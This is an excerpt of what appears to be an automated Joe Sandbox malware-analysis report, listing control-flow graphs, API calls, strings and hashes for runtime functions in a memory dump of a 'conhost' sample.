                                                    control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 926137887-0
                                                    • Opcode ID: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                    • Instruction ID: f187cb6aa2ea60f0469956b9f5200469d8ecfadf0b7e99ee31c93393cd0a6912
                                                    • Opcode Fuzzy Hash: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                    • Instruction Fuzzy Hash: 1521E0B1715A1292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300
                                                    Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 491 140001b87-140001b98 call 140001d40 488->491 492 140001a2c-140001a37 488->492 493 140001970-14000199c call 140001ba0 489->493 490->476 494 1400019a8-1400019c1 490->494 492->490 495 140001a3d-140001a5f 492->495 493->490 498 1400019df-1400019e7 494->498 501 140001a7d-140001a97 495->501 499 1400019e9-140001a0d VirtualProtect 498->499 500 1400019d0-1400019dd 498->500 499->500 500->476 500->498 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->491 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                    • API String ID: 544645111-395989641
                                                    • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                    • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                    • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                    • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                    Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: fprintf
                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                    • API String ID: 383729395-3474627141
                                                    • Opcode ID: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                    • Instruction ID: 91e3a911f83b651f4698e80430053fdc384feaeeeedb9bbeb5e2969e9f62671f
                                                    • Opcode Fuzzy Hash: 6b47e17b8a12b31c17ff5f2ad6e06330f120307e4e61a4ac2284c96fa72ab60d
                                                    • Instruction Fuzzy Hash: BDF0C271A04A4482E212EB2AB9413EAA360E74D3C1F409211FF4D532A1DF3CD1828300
                                                    Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000043.00000002.4114158378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000043.00000002.4114118323.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114200369.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114240970.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000043.00000002.4114323206.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_67_2_140000000_conhost.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                    • String ID:
                                                    • API String ID: 682475483-0
                                                    • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                    • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                    • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                    • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200